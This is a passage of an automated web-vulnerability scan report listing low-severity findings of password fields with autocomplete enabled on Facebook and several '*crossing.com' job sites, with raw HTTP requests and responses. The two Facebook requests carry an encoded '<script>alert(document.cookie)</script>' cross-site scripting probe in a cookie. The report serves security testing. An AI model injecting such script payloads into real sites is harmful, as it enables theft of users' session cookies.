Date: Fri, 21 Jan 2011 22:26:40 GMT
Content-Length: 20984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

11.56. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /plugins/likebox.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=557x557; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djd2b.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.jd2b.com%252F%253Ff05bd%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253Ecf651820abc%253D1%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 22:26:24 GMT
Content-Length: 11419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

11.57. http://www.facebook.com/yahoonews

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /yahoonews

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /yahoonews HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dtheclicker.todayshow.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Ftheclicker.todayshow.com%252F%253F28d8a%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E1b20a3de4c0%253D1%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=A3j8b; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 18:30:09 GMT
Content-Length: 31972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

11.58. http://www.facilitiescrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facilitiescrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.facilitiescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:50 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=nc6a2h1em6s3batcv6fjsg17b1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:50 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117478

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.facilitiescrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.59. http://www.financialservicescrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.financialservicescrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.financialservicescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:51 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=qsnigj0dejirrlqc4mq67l7kd4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117666

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.financialservicescrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.60. http://www.foodservicescrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foodservicescrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.foodservicescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:53 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=eh1vjkcudnunpfbo2nu0rbgdm5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:53 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 110006

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.foodservicescrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.61. http://www.fundraisingcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fundraisingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.fundraisingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:23 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=8b0film2tj8qfoehbgchdt1as6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:24 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 97962

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.fundraisingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.62. http://www.giscrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.giscrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.giscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:26 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0a97dse4dq233td161telhv1q5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:26 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109314

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.giscrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.63. http://www.governmentcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.governmentcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.governmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:48 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=7ipjkgrjvb62q6cj7quksggdq0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:48 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117229

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.governmentcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.64. http://www.graduateschoolloans.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.graduateschoolloans.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.graduateschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:56 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=pv00mgmh60i7tksicjfc8juuq5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92867

<script type="text/javascript" src="http://www.graduateschoolloans.com/script/overlibmws.js"></script>
<script type="text/javascript" src="http://www.graduateschoolloans.com/script/overlibmws_scroll.j
...[SNIP]...
<table cellspacing="0" cellpadding="1" border="0">
<form action="/index.php" name="formaccountlogin" method="post">
           <input type="hidden" name="clslsluserlogin_hdnsubmited" value="1">
...[SNIP]...
<td><input type="password" name="clsregistration_password" class="inputbox" value="Password" onclick="emptytxtboxpassword();"></td>
...[SNIP]...

11.65. http://www.healthcarecrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.healthcarecrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.healthcarecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:59 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pv7nj7m5sv3h8sbbsgp6rc6ju4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:59 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 140242

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.healthcarecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.66. http://www.helpdeskcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.helpdeskcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.helpdeskcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:06 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=20p261b30i1nrgola0d06ago67; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:06 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108384

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.helpdeskcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.67. http://www.hospitalitycrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hospitalitycrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.hospitalitycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:08 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=q8m0d2m0af2bg06uti2kh5prd0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:08 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 129154

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.hospitalitycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.68. http://www.hrcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hrcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.hrcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:17 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=p4a701ljjtkci3m6f866chs876; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:18 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116534

